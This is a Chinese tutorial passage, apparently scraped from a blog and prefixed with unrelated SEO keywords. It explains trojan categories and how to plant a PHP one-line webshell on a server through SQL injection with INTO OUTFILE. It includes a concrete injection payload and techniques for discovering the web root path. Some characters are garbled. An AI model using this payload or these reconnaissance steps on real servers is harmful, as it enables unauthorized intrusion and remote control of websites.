郴州高端网站建设,宝塔面板做网站绑定域名,iis5.1新建网站,银川兴庆建设局网站木马介绍
木马其实就是一段程序#xff0c;这个程序运行到目标主机上时#xff0c;主要可以对目标进行远程控制、盗取信息等功能#xff0c;一般不会破坏目标主机#xff0c;当然#xff0c;这也看黑客是否想要搞破坏。
按照功能分类:远控型、破坏型、流氓软件型、盗取信…木马介绍
木马其实就是一段程序这个程序运行到目标主机上时主要可以对目标进行远程控制、盗取信息等功能一般不会破坏目标主机当然这也看黑客是否想要搞破坏。
按照功能分类:远控型、破坏型、流氓软件型、盗取信息型等等
按照连接方式分类:正向连接、反向连接、无连接等
按照功能大小分类:大马、小马、一句话木马
这里我们简单说一下php的一句话木马然后通过sql注入将一句话木马写入目标服务器再通过木马利用工具连接木马程序从而达到控制目标主机的效果。
通过注入点写入木马程序的前提条件
1.mysql开启了secure_file_priv 的配置.
2.知道了网站代码的真实物理路径.
3.物理路径具备写入权限.
4.最好是root用户这个条件非必须但是有最好.
通过注入点写入木马程序 union select ?php eva($_POST[ jaden]);?,2 into outfile c:\\phpstudyPHPTutorial\\www\ljaden.php--
获得后台真实物理路径的方法
1.收集站点敏感目录比如phpinfo.php探针文件是否可以访问到
2.站点网址输入一些不存在的网址 或者加一些非法参数数据让网站报错看错误信息中是否存在路径信息
3.指纹信息收集 nginx默认站点目录:/usr/share/nginx/htm1配置文件路径:/etc/nginx/nginx.conf apache默认站点目录:/var/www/htm1
4.通过站点其他漏洞来获取配置信息、真实物理路径信息比如如果发现远程命令执行漏洞针对php的站点直接执行一个phpinfo()函数可以看到phpinfo.php所展示的各种信息等等。
